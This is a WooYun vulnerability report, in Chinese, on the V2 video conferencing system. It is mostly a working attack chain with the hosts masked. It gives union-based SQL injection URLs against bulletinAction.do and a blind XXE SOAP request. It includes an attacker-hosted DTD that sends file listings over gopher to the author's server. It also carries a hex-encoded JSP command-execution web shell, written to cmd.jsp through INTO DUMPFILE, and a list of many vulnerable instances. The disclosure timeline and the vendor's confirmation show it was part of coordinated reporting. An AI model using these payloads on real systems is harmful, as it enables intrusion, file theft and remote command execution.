当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143276

漏洞标题:V2视频会议系统某处SQL注射、XXE漏洞(可getshell)

相关厂商:v2tech.com

漏洞作者: loopx9

提交时间:2015-09-25 08:43

修复时间:2016-01-11 15:34

公开时间:2016-01-11 15:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-25: 细节已通知厂商并且等待厂商处理中
2015-09-30: 厂商已经确认,细节仅向厂商公开
2015-10-03: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-11-24: 细节向核心白帽子及相关领域专家公开
2015-12-04: 细节向普通白帽子公开
2015-12-14: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

v2 conference 会议系统

详细说明:

0x1 sql注入
可以union:

http://**.**.**.**/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,user(),3,version(),5%23


union.png


0x2 webservice服务存在blind xxe
官方演示: http://**.**.**.**/Conf/services/ConferenceWebService?wsdl

xml.png


有个名为xml的参数,可以提交xxe payload测试(payload需要实体编码)

POST /Conf/services/ConferenceWebService?wsdl HTTP/1.1
User-Agent: kSOAP/2.0
SOAPAction: http://**.**.**.**
Content-Type: text/xml
Connection: close
Content-Length: 672
Host: **.**.**.**
Accept-Encoding: gzip
<?xml version="1.0" encoding="utf-8"?>
<v:Envelope xmlns:v="http://**.**.**.**/soap/envelope/" xmlns:i="http://**.**.**.**/2001/XMLSchema-instance" xmlns:d="http://**.**.**.**/2001/XMLSchema" xmlns:c="http://**.**.**.**/soap/encoding/">
<v:Header/>
<v:Body>
<getWebServiceResult xmlns="http://**.**.**.**" id="o0" c:root="1">
<tradeCode i:type="d:int">10000</tradeCode>
<xml i:type="d:string">&lt;!DOCTYPE root [
&lt;!ENTITY % xxe SYSTEM &quot;**.**.**.**/xxe.php?file=c:/&quot;&gt;
%xxe;
]&gt;</xml>
<webservicepass i:type="d:string"/>
</getWebServiceResult>
</v:Body>
</v:Envelope>


xxe.php:

<!ENTITY % payload SYSTEM 'file:///<?php echo $_GET[file];?>'>
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'gopher**.**.**.**:20/%payload;'>">
%int;
%trick;


java环境的xxe,可以列目录,将文件列表通过gopher协议传到vps上监听的20端口。

xxe.png


0x3 getshell
会议系统为集成安装环境,windows服务器, apache+mysql4+tomcat,mysql一律root空密码。刚开始是想通过xxe读取目录找到web路径,然后就能利用sql注入写shell了,后来发现程序目录结构相对固定的,使用相对路径就行了。

POST /Conf/jsp/systembulletin/bulletinAction.do?operator=details HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Content-Length: 995
Content-Type: application/x-www-form-urlencoded
sysId=-1%20union%20select%200x3C2540207061676520636F6E74656E74547970653D22746578742F68746D6C3B20636861727365743D47424B2220253E0D0A3C2540207061676520696D706F72743D226A6176612E696F2E2A2220253E203C2520537472696E6720636D64203D20726571756573742E676574506172616D657465722822636D6422293B20537472696E67206F7574707574203D2022223B20696628636D6420213D206E756C6C29207B20537472696E672073203D206E756C6C3B20747279207B2050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328636D64293B204275666665726564526561646572207349203D206E6577204275666665726564526561646572286E657720496E70757453747265616D52656164657228702E676574496E70757453747265616D282929293B207768696C65282873203D2073492E726561644C696E6528292920213D206E756C6C29207B206F7574707574202B3D2073202B225C725C6E223B207D207D20636174636828494F457863657074696F6E206529207B20652E7072696E74537461636B547261636528293B207D207D200D0A6F75742E7072696E746C6E286F7574707574293B253E,'','','','' into dumpfile '../../management/webapps/root/cmd.jsp'%23


shell地址:

http://**.**.**.**/cmd.jsp?cmd=whoami


POST /Conf/jsp/systembulletin/bulletinAction.do?operator=details HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Content-Length: 995
Content-Type: application/x-www-form-urlencoded
sysId=-1%20union%20select%200x3C2540207061676520636F6E74656E74547970653D22746578742F68746D6C3B20636861727365743D47424B2220253E0D0A3C2540207061676520696D706F72743D226A6176612E696F2E2A2220253E203C2520537472696E6720636D64203D20726571756573742E676574506172616D657465722822636D6422293B20537472696E67206F7574707574203D2022223B20696628636D6420213D206E756C6C29207B20537472696E672073203D206E756C6C3B20747279207B2050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328636D64293B204275666665726564526561646572207349203D206E6577204275666665726564526561646572286E657720496E70757453747265616D52656164657228702E676574496E70757453747265616D282929293B207768696C65282873203D2073492E726561644C696E6528292920213D206E756C6C29207B206F7574707574202B3D2073202B225C725C6E223B207D207D20636174636828494F457863657074696F6E206529207B20652E7072696E74537461636B547261636528293B207D207D200D0A6F75742E7072696E746C6E286F7574707574293B253E,'','','','' into dumpfile '../../management/webapps/root/cmd.jsp'%23


shell:

http://**.**.**.**/cmd.jsp?cmd=whoami

漏洞证明:

cmd.png


案例挺多的:

http://**.**.**.**:18080/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,2,3,4,5%23
**.**.**.**/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,2,3,4,5%23
http://**.**.**.**/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,2,3,4,5%23
http://**.**.**.**:443/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,2,3,4,5%23
http://**.**.**.**/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,2,3,4,5%23
**.**.**.**:8288/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,2,3,4,5%23
http://**.**.**.**/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,2,3,4,5%23
http://**.**.**.**/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,2,3,4,5%23
http://**.**.**.**/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,2,3,4,5%23
http://**.**.**.**/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,2,3,4,5%23
http://**.**.**.**/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,2,3,4,5%23
http://**.**.**.**/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,2,3,4,5%23

修复方案:

参数过滤
修复xxe

版权声明:转载请注明来源 loopx9@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-30 08:28

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件和电话通报,由其后续提供解决方案并协调相关用户单位处置。 按多个风险点评分,rank 20

最新状态:

暂无


漏洞评价:

评价